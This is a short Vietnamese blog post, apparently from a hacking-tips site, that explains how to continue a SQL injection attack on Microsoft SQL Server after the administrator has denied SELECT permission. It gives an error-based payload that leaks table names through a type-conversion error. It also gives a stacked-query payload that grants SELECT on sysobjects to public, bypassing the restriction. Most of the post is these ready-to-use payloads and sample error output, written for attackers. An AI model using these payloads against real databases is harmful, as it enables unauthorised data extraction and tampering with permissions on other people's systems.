chia sẻ

Hack SQL Injection bị deny SELECT

Bình thường khi query
Trích dẫn
convert(int,(select top 1 table_name from information_schema.tables))--

bay ra lỗi
Trích dẫn
Syntax error converting the nvarchar value 'table_name' to a column of data type int

nhưng nếu bay ra lỗi
Trích dẫn
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.

thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.

thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Trích dẫn
;use dataname grant keyword on tables to public

trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào

Trích dẫn
;use vnc grant select on sysobjects to public--

Không có nhận xét nào:

Đăng nhận xét

 
Ky nang ban hang ky-nang-ban-hang
10 10 1125 (c) by
Google Thủ thuật, hacking, tool, code, công cụ